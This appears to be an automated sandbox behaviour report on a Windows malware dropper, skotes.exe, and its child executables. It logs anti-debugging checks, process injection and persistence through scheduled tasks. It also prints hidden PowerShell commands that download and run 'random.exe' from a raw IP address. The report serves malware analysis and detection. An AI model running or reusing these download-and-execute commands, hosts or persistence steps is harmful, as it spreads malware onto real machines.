Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

Code function: 0_2_058B0804 rdtsc

0_2_058B0804

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Code function: 9_2_004443D0 LdrInitializeThunk,

9_2_004443D0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_0048652B mov eax, dword ptr fs:[00000030h]	4_2_0048652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_0048A302 mov eax, dword ptr fs:[00000030h]	4_2_0048A302
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 8_2_02E12149 mov edi, dword ptr fs:[00000030h]	8_2_02E12149
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 8_2_02E122C6 mov edi, dword ptr fs:[00000030h]	8_2_02E122C6

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\tYliuwV[1].ps1, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1085385041\tYliuwV.ps1, type: DROPPED

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_3616.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_6452.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: m5UP2Yj.exe PID: 5756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 4744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 5564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6452, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Code function: 8_2_02E12149 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

8_2_02E12149

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Memory written: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Memory written: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Memory written: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Memory written: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe "C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe "C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process created: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process created: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE "C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn iHAoEmaFAXq /tr "mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: skotes.exe, skotes.exe, 00000004.00000002.2778651756.000000000063D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: "eS+Program Manager
Source: 9db7f37142.exe, 0000001B.00000002.2294508918.0000000000502000.00000002.00000001.01000000.00000011.sdmp, 9db7f37142.exe, 00000032.00000002.2471886706.0000000000502000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: hHtR1O06GH.exe, 00000000.00000002.1528652158.00000000010BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1552846889.000000000063D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000004.00000002.2778651756.000000000063D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: o"eS+Program Manager
Source: m5UP2Yj.exe, 0000000F.00000002.2150947203.00000000011EF000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: \|oProgram Manager
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE, 0000002A.00000002.2525015693.0000000000E32000.00000040.00000001.01000000.0000001C.sdmp	Binary or memory string: CProgram Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 4_2_0046D3E2 cpuid

4_2_0046D3E2

Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085139001\xclient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085381001\xclient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085381001\xclient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085385041\tYliuwV.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085386001\Ta3ZyUR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085386001\Ta3ZyUR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085388001\d2YQIJa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085388001\d2YQIJa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085389001\Bjkm5hE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085389001\Bjkm5hE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085390001\qFqSpAp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085390001\qFqSpAp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
